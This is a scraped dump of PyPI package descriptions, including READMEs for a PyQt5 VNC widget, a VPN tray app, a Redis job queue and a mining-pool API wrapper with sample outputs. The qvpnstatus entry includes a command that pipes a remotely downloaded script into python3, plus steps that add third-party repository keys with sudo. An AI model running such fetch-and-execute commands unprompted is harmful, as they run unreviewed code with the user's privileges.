functions:parseanddump.parseis\nused to read config files, whiledumpis used to write config\nfiles. The basic syntax of config files isproperty = value. The\ncomplete documentation is included within the qvikconfig library and\ncan be accessed by executingpydoc qvikconfig.Tests of qvikconfig config files are located in thetests/directory of the distribution."} +{"package": "qviz", "pacakge-description": "No description available on PyPI."} +{"package": "qvm", "pacakge-description": "No description available on PyPI."} +{"package": "qvmake", "pacakge-description": "No description available on PyPI."} +{"package": "qvmcli", "pacakge-description": "No description available on PyPI."} +{"package": "qvncwidget", "pacakge-description": "pyQVNCWidgetVNC Widget for Python using PyQt5How to installpip3installqvncwidgetTODO:Proper error handlingonFatalErrorsupport for more than just RAW and RGB32 PIXEL_FORMATssupport for compressionimplement rfb 3.7 and 3.8implement local and remote clipboardExamples (see /examples folder)importsysfromPyQt5.QtWidgetsimportQApplication,QMainWindowfromqvncwidgetimportQVNCWidgetclassWindow(QMainWindow):def__init__(self):super(Window,self).__init__()self.setWindowTitle(\"QVNCWidget\")self.vnc=QVNCWidget(parent=self,host=\"127.0.0.1\",port=5900,password=\"1234\",readOnly=True)self.setCentralWidget(self.vnc)# if you want to resize the window to the resolution of the# VNC remote device screen, you can do thisself.vnc.onInitialResize.connect(self.resize)self.vnc.start()defcloseEvent(self,ev):self.vnc.stop()returnsuper().closeEvent(ev)app=QApplication(sys.argv)window=Window()window.resize(800,600)window.show()sys.exit(app.exec_())Example with widget input eventsimportsysfromPyQt5.QtWidgetsimportQApplication,QMainWindowfromqvncwidgetimportQVNCWidgetclassWindow(QMainWindow):def__init__(self):super(Window,self).__init__()self.setWindowTitle(\"QVNCWidget\")self.vnc=QVNCWidget(parent=self,host=\"127.0.0.1\",port=5900,password=\"1234\",readOnly=False)self.setCentralWidget(self.vnc)# we need to request focus otherwise we will not get keyboard input eventsself.vnc.setFocus()# you can disable mouse tracking if desiredself.vnc.setMouseTracking(False)self.vnc.start()defcloseEvent(self,ev):self.vnc.stop()returnsuper().closeEvent(ev)app=QApplication(sys.argv)window=Window()window.resize(800,600)window.show()sys.exit(app.exec_())Example with window input eventsIn this example we are passing input events from the window to the widgetimportsysfromPyQt5.QtWidgetsimportQApplication,QMainWindowfromqvncwidgetimportQVNCWidgetclassWindow(QMainWindow):def__init__(self):super(Window,self).__init__()self.setWindowTitle(\"QVNCWidget\")self.vnc=QVNCWidget(parent=self,host=\"127.0.0.1\",port=5900,password=\"1234\",readOnly=False)self.setCentralWidget(self.vnc)# you can disable mouse tracking if desiredself.vnc.setMouseTracking(False)self.vnc.start()defkeyPressEvent(self,ev):self.vnc.keyPressEvent(ev)returnsuper().keyPressEvent(ev)# in case you need the signal somewhere else in the windowdefkeyReleaseEvent(self,ev):self.vnc.keyReleaseEvent(ev)returnsuper().keyReleaseEvent(ev)# in case you need the signal somewhere else in the windowdefcloseEvent(self,ev):self.vnc.stop()returnsuper().closeEvent(ev)app=QApplication(sys.argv)window=Window()window.resize(800,600)window.show()sys.exit(app.exec_())Referenceshttps://datatracker.ietf.org/doc/html/rfc6143https://vncdotool.readthedocs.io/en/0.8.0/rfbproto.html?highlight=import#string-encodings"} +{"package": "qvpnstatus", "pacakge-description": "QVpnStatusVPN Status tray icon for monitoring VPN connections from nmcli. Allows you to specify interval to check and also toggle off sound notifications.See linkherefor more information.It is based on mycopier-poetry-fbsskeleton which uses PyQT5 for the GUI elements andfbsfor the installer creation.Installation###Debian/Ubuntu/Mint Linux InstallationManual Installer link without automatic updates.https://fbs.sh/qvpnstatus/qvpnstatus/qvpnstatus.deb###Install from website.wgethttps://fbs.sh/qvpnstatus/qvpnstatus/qvpnstatus.deb\nsudodpkg-iqvpnstatus.deb####To install with automatic updates supported via repo.sudoapt-getinstall-yapt-transport-https\nwget-qO-https://fbs.sh/qvpnstatus/qvpnstatus/public-key.gpg|sudoapt-keyadd-echo'deb [arch=amd64] https://fbs.sh/qvpnstatus/qvpnstatus/deb stable main'|sudotee/etc/apt/sources.list.d/qvpnstatus.list\nsudoapt-getupdate;sudoapt-getinstall-yqvpnstatusInstallation is done into /opt/qvpnstatus/###Arch Linux Installation####Manual Installer link without automatic updates.https://fbs.sh/qvpnstatus/qvpnstatus/qvpnstatus.pkg.tar.xz####To install with automatic updates supported via repo.curl-Ohttps://fbs.sh/qvpnstatus/qvpnstatus/public-key.gpg&&sudopacman-key--addpublic-key.gpg&&sudopacman-key--lsign-key9EF5FD1B7714354D0535303CFF1B29F26A1378E8&&rmpublic-key.gpgecho-e'\\n[qvpnstatus]\\nServer = https://fbs.sh/qvpnstatus/qvpnstatus/arch'|sudotee-a/etc/pacman.conf\nsudopacman-SyuqvpnstatusIf you already have the app installed, you can force an immediate update via:sudopacman-Syu--neededqvpnstatusInstallation viapip:python3.7-mpipinstallqvpnstatusInstallation viapipx:python3.7-mpipinstall--userpipx\n\npipxinstall--pythonpython3.7qvpnstatusDev RequirementsQVpnStatus requires Python 3.7 or above.To install Python 3.7, I recommend usingpyenv.# install pyenvgitclonehttps://github.com/pyenv/pyenv~/.pyenv# setup pyenv (you should also put these three lines in .bashrc or similar)exportPATH=\"${HOME}/.pyenv/bin:${PATH}\"exportPYENV_ROOT=\"${HOME}/.pyenv\"eval\"$(pyenvinit-)\"# install Python 3.7pyenvinstall3.7.12# make it available globallypyenvglobalsystem3.7.12Creating a native installerclone the repo locallygit clone git@gitlab.com:mikeramsey/qvpnstatus.gitInstallpoetrycurl -sSL https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py | python3 -Setting the below settings are highly recommended for ensuring the virtual environment poetry makes is located inside the project folder.poetry config virtualenvs.create true; poetry config virtualenvs.in-project true;Runpoetry installin the path to install all the dependenciesEnter the virtual environment that poetry created. This can be found by runningpoetry env infoSee alsohereRunfbs freezeand thenfbs installerafterwards if the frozen \"compiled\" app runs without issues. Seeherefor more on how fbs works. And alsohereCreditsSpecial thanks to below references and resources.Resources:\nPython nmcli api package which made this a breeze:https://github.com/ushiboy/nmclihttps://pypi.org/project/nmcli/References:https://www.learnpyqt.com/tutorials/system-tray-mac-menu-bar-applications-pyqt/https://itectec.com/ubuntu/ubuntu-connect-disconnect-from-vpn-from-the-command-line/https://www.devdungeon.com/content/python3-qt5-pyqt5-tutorial#toc-9"} +{"package": "qvpy", "pacakge-description": "UNKNOWN"} +{"package": "qvrpy", "pacakge-description": "qvrpy - python interface to QVR ProThis is a high-level abstraction of the interface to theQVR Prosurveillance system byQNAPThe specifications for the raw QVR Pro API can be foundat this link."} +{"package": "qvsed", "pacakge-description": "QVSED is a volatile and small text editor.\u201cVolatile\u201d means that QVSED is entirely stateless - once you open a file, QVSED doesn\u2019t store any file paths or any other data other than the text contents of the file you loaded.\nAdditionally, QVSED won\u2019t prompt you if you\u2019re about to potentially lose an unsaved file, since it doesn\u2019t know of any file metadata.\nYou may be prompted if you\u2019re about to overwrite a file, but that\u2019s up to your OS, not QVSED.QVSED follows the philosophy of ultra-minimalism, with its heavy emphasis on just editing text and nothing more.\nQVSED\u2019s editing style is text-based, not file-based like basically every other editor out there.\nText goes in, from a file, and then text later comes out, into another or perhaps the same file.QVSED can be used as a simple scratchpad or throwaway editor, as well as a general editing software application, since it won\u2019t prompt you if you do anything destructive.\nIt stays out of your way on many occasions. Whether or not that\u2019s a good thing is up to you."} +{"package": "qvsr-otree-demo1", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qvstbus", "pacakge-description": "No description available on PyPI."} +{"package": "qvtool", "pacakge-description": "No description available on PyPI."} +{"package": "qw", "pacakge-description": "qw==qw (or QueueWorker) is used to run worker processes which listen on a redis list for jobs to process.## Setup### pip`pip install qw`### git```git clone git://github.com/brettlangdon/qw.gitcd ./qwpython setup.py install```## Design### ManagerThe manager is simply a process manager. It's job is to start/stop worker sub-processes.### WorkerThe workers are processes which sit and listen for jobs on a few queues and then processthose jobs.### TargetThe worker/manager take a `target` which can be either a function or a string (importable function).```pythondef target(job_id, job_data):passmanager = Manager(target)# ORmanager = Manager('__main__.target')```### QueuesThere are a few different queues that are used. The job queues are just redis lists, manager/worker lists are sets and jobs are hashes.A worker picks up a job from either `all:jobs`, `:jobs` or `:jobs`, pulls the corresponding `job:` key andprocesses it with the provided `target`, after processing it will then remove the `job:` key as well as the job id fromthe `:jobs` queue.* `all:managers` - a set of all managers* `all:jobs` - a queue that all workers can pull jobs from, the values are just the job ids* `job:` - a hash of the job data* `:workers` - a set of all workers belonging to a given manager* `:jobs` - a queue of jobs for a specific manager, workers will try to pull from here before `all:jobs`, the values are just the job ids* `:jobs` - a queue of jobs for a specific worker, this is meant as a in progress queue for each worker, the workers will pull jobs into this queue from either `:jobs` or `all:jobs`, the values are just the job ids## Basic Usage```pythonfrom qw.manager import Managerdef job_printer(job_id, job_data):print job_idprint job_datamanager = Manager(job_printer)manager.start()manager.join()```## API### Manager(object)* `__init__(self, target, host=\"localhost\", port=6379, db=0, num_workers=None, name=None)`* `start(self)`* `stop(self)`* `join(self)`### Worker(multiprocess.Process)* `__init__(self, client, target, manager_name=None, timeout=10)`* `run(self)`* `shutdown(self)`### Client(redis.StrictRedi)* `__init__(self, host=\"localhost\", port=6379, db=0)`* `register_manager(self, name)`* `deregister_manager(self, name)`* `register_worker(self, manager, name)`* `deregister_worker(self, manager, name)`* `queue_job(self, job_data, manager=None, worker=None)`* `fetch_next_job(self, manager, worker, timeout=10)`* `finish_job(self, job_id, worker_name)`* `get_all_managers(self)`* `get_manager_workers(self, manager_name)`* `get_worker_pending_jobs(self, worker_name)`* `get_manager_queued_jobs(self, manager_name)`* `get_all_queued_jobs(self)`* `get_all_pending_jobs(self)`## CLI Tools### qw-managerThe `qw-manager` tool is used to start a new manager process with the provided `target` string, which gets runfor every job processed by a worker.```$ qw-manager --helpUsage:qw-manager [--level=] [--workers=] [--name=] [--host=] [--port=] [--db=] qw-manager (--help | --version)Options:--help Show this help message--version Show version information-l --level= Set the log level (debug,info,warn,error) [default: info]-w --workers= Set the number of workers to start, defaults to number of cpus-n --name= Set the manager name, defaults to hostname-h --host= Set the redis host to use [default: localhost]-p --port= Set the redis port to use [default: 6379]-d --db= Set the redis db number to use [default: 0]```### qw-clientThe `qw-client` command is useful to look at basic stats of running managers, workers and job queuesas well as to push json data in the form of a string or a file to the main queue or a manager specific queue.```$ qw-client --helpUsage:qw-client [--host=] [--port=] [--db=] managersqw-client [--host=] [--port=] [--db=] workers []qw-client [--host=] [--port=] [--db=] jobs []qw-client [--host=] [--port=] [--db=] queue string []qw-client [--host=] [--port=] [--db=] queue file []qw-client (--help | --version)Options:--help Show this help message--version Show version information-h --host= Set the redis host to use [default: localhost]-p --port= Set the redis port to use [default: 6379]-d --db= Set the redis db number to use [default: 0]```"} +{"package": "qwack", "pacakge-description": "qwack: a quickly writtenhack(1985) variant for Python."} +{"package": "qwackchat", "pacakge-description": "No description available on PyPI."} +{"package": "qwak", "pacakge-description": "qwak is an APACHE licensed library written in Python designed to provide\na simple to use API wrapper forMPOS.Installation:From source use$ python setup.py installor install from PyPi$ pip install qwakConfiguration:Create a~/.qwak_config.pyfile and fill in your pool URL and API\nkey like so:#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nconfig = {\n 'pool_url': 'http://example.com',\n 'api_key' : '12345abcde'\n}API Documentation:qwakhandles all the API calls MPOS provides. Examples kindly\nprovided byscript.io.Pool:Public:>>> import qwak\n>>> qwak.public()\n{\n \"pool_name\": \"Scrypt.io | HBN Pool\",\n \"last_block\": 817675,\n \"workers\": 33,\n \"shares_this_round\": 20764,\n \"network_hashrate\": 573459242.17,\n \"hashrate\": 46773\n}Pool info:>>> qwak.pool_info()\n{\n \"getpoolinfo\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"coinname\": \"HoboNickels\",\n \"algorithm\": \"scrypt\",\n \"txfee\": null,\n \"min_ap_threshold\": 5,\n \"cointarget\": \"30\",\n \"stratumport\": \"37373\",\n \"payout_system\": \"prop\",\n \"currency\": \"HBN\",\n \"max_ap_threshold\": 5000,\n \"fees\": 0.5,\n \"coindiffchangetarget\": 5\n },\n \"runtime\": 0.99682807922363\n }\n}Pool status:>>> qwak.pool_status()\n{\n \"getpoolstatus\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"nethashrate\": 614243980.49,\n \"pool_name\": \"Scrypt.io | HBN Pool\",\n \"nextnetworkblock\": 817770,\n \"currentnetworkblock\": 817769,\n \"estshares\": 13180.24593408,\n \"workers\": 34,\n \"networkdiff\": 12.87133392,\n \"timesincelast\": 2816,\n \"efficiency\": 98.81,\n \"lastblock\": 817675,\n \"esttime\": 1160.4105424495,\n \"hashrate\": 47640\n },\n \"runtime\": 5.7098865509033\n }\n}Pool hashrate:>>> qwak.pool_hashrate()\n{\n \"getpoolhashrate\": {\n \"version\": \"1.0.0\",\n \"data\": 47591,\n \"runtime\": 32.737016677856\n }\n}Pool sharerate:>>> qwak.pool_sharerate()\n{\n \"gethourlyhashrates\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"mine\": false,\n \"pool\": {\n \"20\": 41289,\n \"21\": 40548,\n \"22\": 38363,\n \"23\": 40847,\n \"1\": 38504,\n \"0\": 38877,\n \"3\": 38939,\n \"2\": 37899,\n \"5\": 39439,\n \"4\": 39971,\n \"7\": 40100,\n \"6\": 40040,\n \"9\": 39971,\n \"8\": 40278,\n \"11\": 40320,\n \"10\": 40180,\n \"13\": 39690,\n \"12\": 39268,\n \"15\": 38260,\n \"14\": 40554,\n \"17\": 41645,\n \"16\": 38543,\n \"19\": 39174,\n \"18\": 12647\n }\n },\n \"runtime\": 1261.7139816284\n }\n}Pool workers:>>> qwak.current_workers()\n{\n \"getcurrentworkers\": {\n \"version\": \"1.0.0\",\n \"data\": 32,\n \"runtime\": 1.2381076812744\n }\n}Pool top contributors:>>> qwak.top_contributors()\n{\n \"gettopcontributors\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"hashes\": {\n \"account\": \"hip_Hobo\",\n \"hashrate\": 370.5\n },\n \"shares\": [\n {\n \"account\": \"SaschaAc\",\n \"shares\": 731\n },\n {\n \"account\": \"unick\",\n \"shares\": 353\n },\n {\n \"account\": \"ubuntufreak\",\n \"shares\": 264\n },\n {\n \"account\": \"graymatter\",\n \"shares\": 157\n },\n {\n \"account\": \"Meska\",\n \"shares\": 109\n },\n {\n \"account\": \"splint9ka\",\n \"shares\": 107\n },\n {\n \"account\": \"licocraft\",\n \"shares\": 96\n },\n {\n \"account\": \"lepetitdiable\",\n \"shares\": 82\n },\n {\n \"account\": \"interfuse\",\n \"shares\": 67\n },\n {\n \"account\": \"anonymous\",\n \"shares\": 56\n },\n {\n \"account\": \"goldfeverhobo\",\n \"shares\": 50\n },\n {\n \"account\": \"fonky\",\n \"shares\": 31\n },\n {\n \"account\": \"Eight\",\n \"shares\": 22\n },\n {\n \"account\": \"hip_Hobo\",\n \"shares\": 21\n },\n {\n \"account\": \"zelszels\",\n \"shares\": 21\n }\n ]\n },\n \"runtime\": 2.6769638061523\n }\n}Blocks:Estimated time to next block:>>> qwak.estimated_time()\n{\n \"getestimatedtime\": {\n \"version\": \"1.0.0\",\n \"data\": 63541.382146264,\n \"runtime\": 2724.8191833496\n }\n}Time since last block:>>> qwak.block_last()\n{\n \"gettimesincelastblock\": {\n \"version\": \"1.0.0\",\n \"data\": 3028,\n \"runtime\": 1.3439655303955\n }\n}Block count:>>> qwak.block_count()\n{\n \"getblockcount\": {\n \"version\": \"1.0.0\",\n \"data\": 817779,\n \"runtime\": 1.6119480133057\n }\n}Blocks found on pool:>>> qwak.blocks_found()\n{\n \"getblocksfound\": {\n \"version\": \"1.0.0\",\n \"data\": [\n {\n \"estshares\": 12862,\n \"worker_name\": \"SaschaAc.6\",\n \"account_id\": 226,\n \"blockhash\": \"000000000efea095fd26518b19820b870e9086e93855f4977e1766f7e9b711c0\",\n \"is_anonymous\": 0,\n \"shares\": 1993,\n \"height\": 817675,\n \"difficulty\": 12.56077319,\n \"amount\": 5,\n \"confirmations\": 25,\n \"time\": 1399218719,\n \"share_id\": 85212233,\n \"id\": 23245,\n \"finder\": \"SaschaAc\",\n \"accounted\": 1\n },\n ...\n {\n \"estshares\": 14183,\n \"worker_name\": \"SaschaAc.5\",\n \"account_id\": 226,\n \"blockhash\": \"0000000008898c8e8b613db2a7c83aa0f972de19826db8ec7b8bfbed8f4b477d\",\n \"is_anonymous\": 0,\n \"shares\": 4951,\n \"height\": 815667,\n \"difficulty\": 13.85024985,\n \"amount\": 5,\n \"confirmations\": 25,\n \"time\": 1399159614,\n \"share_id\": 84650456,\n \"id\": 23211,\n \"finder\": \"SaschaAc\",\n \"accounted\": 1\n }\n ],\n \"runtime\": 1.2688636779785\n }\n}Block stats:>>> qwak.block_stats()\n{\n \"getblockstats\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"12MonthShares\": \"82306047\",\n \"1HourEstimatedShares\": 26298,\n \"1HourDifficulty\": 25.6816834,\n \"7DaysShares\": \"6701309\",\n \"7DaysDifficulty\": 5816.95565409,\n \"12MonthAmount\": 115530,\n \"TotalValid\": \"23106\",\n \"24HourDifficulty\": 642.6008193,\n \"24HourTotal\": \"48\",\n \"TotalDifficulty\": 71859.73857944,\n \"7DaysAmount\": 2280,\n \"24HourValid\": \"48\",\n \"4WeeksOrphan\": \"32\",\n \"7DaysOrphan\": \"0\",\n \"1HourAmount\": 10,\n \"12MonthOrphan\": \"134\",\n \"12MonthTotal\": \"23240\",\n \"4WeeksTotal\": \"3047\",\n \"1HourOrphan\": \"0\",\n \"TotalEstimatedShares\": 73584372,\n \"12MonthValid\": \"23106\",\n \"24HourShares\": \"828972\",\n \"4WeeksValid\": \"3015\",\n \"12MonthEstimatedShares\": 73584372,\n \"7DaysEstimatedShares\": 5956563,\n \"12MonthDifficulty\": 71859.73857944,\n \"TotalShares\": \"82306047\",\n \"TotalAmount\": 115530,\n \"24HourOrphan\": \"0\",\n \"7DaysValid\": \"456\",\n \"24HourEstimatedShares\": 658023,\n \"4WeeksAmount\": 15075,\n \"24HourAmount\": 240,\n \"7DaysTotal\": \"456\",\n \"1HourShares\": \"39467\",\n \"1HourValid\": \"2\",\n \"4WeeksDifficulty\": 22239.12019247,\n \"1HourTotal\": \"2\",\n \"4WeeksEstimatedShares\": 22772859,\n \"4WeeksShares\": \"25594317\",\n \"TotalOrphan\": \"134\",\n \"Total\": 23240\n },\n \"runtime\": 203.04179191589\n }\n}Network:Difficulty:>>> qwak.difficulty()\n{\n \"getdifficulty\": {\n \"version\": \"1.0.0\",\n \"data\": 13.11145585,\n \"runtime\": 1.8680095672607\n }\n}User:User status:>>> qwak.user_status()\n{\n \"getuserstatus\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"username\": \"username\",\n \"sharerate\": \"1.27\",\n \"hashrate\": 5312.79,\n \"shares\": {\n \"username\": \"username\",\n \"is_anonymous\": 0,\n \"invalid\": 1,\n \"donate_percent\": 0,\n \"valid\": 42,\n \"id\": 40\n }\n },\n \"runtime\": 199.51820373535\n }\n}User balance:>>> qwak.user_balance()\n{\n \"getuserbalance\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"confirmed\": 8.22416031,\n \"orphaned\": 6.99071406,\n \"unconfirmed\": 1.65332559\n },\n \"runtime\": 19.626140594482\n }\n}User hashrate:>>> qwak.user_hashrate()\n{\n \"getuserhashrate\": {\n \"version\": \"1.0.0\",\n \"data\": 5474,\n \"runtime\": 14.457941055298\n }\n}User sharerate:>>> qwak.user_sharerate()\n{\n \"getusersharerate\": {\n \"version\": \"1.0.0\",\n \"data\": \"1.42\",\n \"runtime\": 1.2180805206299\n }\n}User transactions:>>> qwak.user_transactions()\n{\n \"getusertransactions\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"transactionsummary\": {\n \"Fee\": 482.61430904998,\n \"TXFee\": 238.79999999999,\n \"Credit\": 115545.00010462,\n \"Donation\": 43.14081271,\n \"Debit_AP\": 96526.28776731,\n \"Debit_MP\": 16190.69451484\n },\n \"transactions\": [\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00382566,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898454\n },\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.76513133,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898453\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00023474,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898452\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.04694836,\n \"confirmations\": 10,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898451\n },\n {\n \"username\": \"interfuse\",\n \"blockhash\": null,\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:03:10\",\n \"txid\": null,\n \"amount\": 0.1,\n \"confirmations\": null,\n \"height\": null,\n \"type\": \"TXFee\",\n \"id\": 898450\n }\n ]\n },\n \"runtime\": 1032.723903656\n }\n}User sharerate:>>> qwak.user_sharerate()\n{\n \"getusersharerate\": {\n \"version\": \"1.0.0\",\n \"data\": \"1.42\",\n \"runtime\": 1.2180805206299\n }\n}User transactions:>>> qwak.user_transactions()\n{\n \"getusertransactions\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"transactionsummary\": {\n \"Fee\": 482.61430904998,\n \"TXFee\": 238.79999999999,\n \"Credit\": 115545.00010462,\n \"Donation\": 43.14081271,\n \"Debit_AP\": 96526.28776731,\n \"Debit_MP\": 16190.69451484\n },\n \"transactions\": [\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00382566,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898454\n },\n {\n \"username\": \"unick\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.76513133,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898453\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.00023474,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Fee\",\n \"id\": 898452\n },\n {\n \"username\": \"zelszels\",\n \"blockhash\": \"000000000717fb23284487ffc964af5d39a25e58cf47ca30c44aef777e4aee57\",\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:09:05\",\n \"txid\": null,\n \"amount\": 0.04694836,\n \"confirmations\": 13,\n \"height\": 817836,\n \"type\": \"Credit\",\n \"id\": 898451\n },\n {\n \"username\": \"interfuse\",\n \"blockhash\": null,\n \"coin_address\": null,\n \"timestamp\": \"2014-05-04 19:03:10\",\n \"txid\": null,\n \"amount\": 0.1,\n \"confirmations\": null,\n \"height\": null,\n \"type\": \"TXFee\",\n \"id\": 898450\n }\n ]\n },\n \"runtime\": 1028.6419391632\n }\n}User workers:>>> qwak.user_workers()\n{\n \"getuserworkers\": {\n \"version\": \"1.0.0\",\n \"data\": [\n {\n \"username\": \"username.5870x2\",\n \"monitor\": 0,\n \"count_all_archive\": 7,\n \"difficulty\": 128,\n \"count_all\": 107,\n \"password\": \"x\",\n \"id\": 41,\n \"hashrate\": 797\n },\n {\n \"username\": \"username.6970\",\n \"monitor\": 0,\n \"count_all_archive\": 1,\n \"difficulty\": 128,\n \"count_all\": 63,\n \"password\": \"x\",\n \"id\": 43,\n \"hashrate\": 447\n },\n {\n \"username\": \"username.2k\",\n \"monitor\": 0,\n \"count_all_archive\": 0,\n \"difficulty\": 0,\n \"count_all\": 0,\n \"password\": \"x\",\n \"id\": 970,\n \"hashrate\": 0\n },\n {\n \"username\": \"username.6850\",\n \"monitor\": 0,\n \"count_all_archive\": 3,\n \"difficulty\": 128,\n \"count_all\": 21,\n \"password\": \"x\",\n \"id\": 980,\n \"hashrate\": 168\n },\n {\n \"username\": \"username.2k2\",\n \"monitor\": 0,\n \"count_all_archive\": 23,\n \"difficulty\": 128,\n \"count_all\": 287,\n \"password\": \"x\",\n \"id\": 1062,\n \"hashrate\": 2167\n },\n {\n \"username\": \"username.2\",\n \"monitor\": 0,\n \"count_all_archive\": 31,\n \"difficulty\": 128,\n \"count_all\": 261,\n \"password\": \"x\",\n \"id\": 1078,\n \"hashrate\": 2042\n }\n ],\n \"runtime\": 23.391008377075\n }\n}Dashboard:>>> qwak.user_dashboard()\n{\n \"getdashboarddata\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"personal\": {\n \"sharedifficulty\": 0,\n \"sharerate\": 0,\n \"estimates\": {\n \"payout\": 0,\n \"donation\": 0,\n \"fee\": 0,\n \"block\": 0\n },\n \"shares\": {\n \"invalid_percent\": 0,\n \"unpaid\": 0,\n \"valid\": 0,\n \"invalid\": 0\n },\n \"hashrate\": 0\n },\n \"raw\": {\n \"personal\": {\n \"hashrate\": 0\n },\n \"network\": {\n \"nextdifficulty\": 3.96825133,\n \"esttimeperblock\": 76.040271480616,\n \"blocksuntildiffchange\": 1,\n \"hashrate\": 621.58896191\n },\n \"pool\": {\n \"hashrate\": 47074\n }\n },\n \"system\": {\n \"load\": [\n 1.35,\n 1.21,\n 1.17\n ]\n },\n \"pool\": {\n \"info\": {\n \"currency\": \"HBN\",\n \"name\": \"Scrypt.io | HBN Pool\"\n },\n \"workers\": 35,\n \"shares\": {\n \"invalid_percent\": 1.35,\n \"progress\": 1.1,\n \"valid\": 3403,\n \"estimated\": 13139,\n \"invalid\": 690\n },\n \"difficulty\": 16,\n \"target_bits\": 20,\n \"price\": \"0.00043614\",\n \"hashrate\": 0.723849\n },\n \"network\": {\n \"blocksuntildiffchange\": 1,\n \"esttimeperblock\": 76.04,\n \"difficulty\": 12.83067929,\n \"hashrate\": 51.144842457,\n \"nextdifficulty\": 3.96825133,\n \"block\": 208173\n }\n },\n \"runtime\": 55.642127990723\n }\n}User navbar:>>> qwak.user_navbar()\n{\n \"getnavbardata\": {\n \"version\": \"1.0.0\",\n \"data\": {\n \"raw\": {\n \"workers\": 30,\n \"pool\": {\n \"hashrate\": 47074\n }\n },\n \"network\": {\n \"difficulty\": 13.02524623,\n \"block\": 817867,\n \"hashrate\": 621.58896191\n },\n \"pool\": {\n \"progress\": 81.43,\n \"workers\": 30,\n \"estimated\": 13338,\n \"hashrate\": 47074\n }\n },\n \"runtime\": 14.021873474121\n }\n}License:Apache v2.0 License\nCopyright 2014 Martin Simon\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.Buy me a coffee?If you feel like buying me a coffee (or a beer?), donations are welcome:WDC : WbcWJzVD8yXt3yLnnkCZtwQo4YgSUdELkj\nHBN : F2Zs4igv8r4oJJzh4sh4bGmeqoUxLQHPki\nDOGE: DRBkryyau5CMxpBzVmrBAjK6dVdMZSBsuS"} +{"package": "qwak-core", "pacakge-description": "Qwak CoreQwak is an end-to-end production ML platform designed to allow data scientists to build, deploy, and monitor their models in production with minimal engineering friction.\nQwak Core contains all the objects and tools necessary to use the Qwak Platform"} +{"package": "qwak-inference", "pacakge-description": "Qwak InferenceQwak is an end-to-end production ML platform designed to allow data scientists to build, deploy, and monitor their models in production with minimal engineering friction.\nQwak Inference contains tools that allow predicting against the Qwak Platform"} +{"package": "qwak-sdk", "pacakge-description": "Qwak SDKQwak is an end-to-end production ML platform designed to allow data scientists to build, deploy, and monitor their models in production with minimal engineering friction."} +{"package": "qwak-sim", "pacakge-description": "QWAKQuantum Walk Analysis Kit - A Python package for continuous-time quantum walk (CTQW) simulation.Additionally, a fullstack web app built with Flask and PyMongo is available onHeroku.Table of Contents:FundingInstallationUsageDocumentationContributingFundingThis work is financed by National Funds through the Portuguese funding agency, FCT - Funda\u00e7\u00e3o para a Ci\u00eancia e a Tecnologia, within project UIDB/50014/2020.InstallationYou can install the package both through PyPipip install qwak-simor locally, by cloning the project, installing the requirements via pip followed bypip install .in the cloned folder. A virtual environment is highly recommended.DependenciesNumpyScipySympymatplotlibnetworkxQuTipeelStep-by-step installation instructions can be found in the documentationinstallationpage.UsageA basic plot of the probability distribution for a CTQW with a walker starting in a superposition of central positions, in a cyclic graph, can be achieved via the following 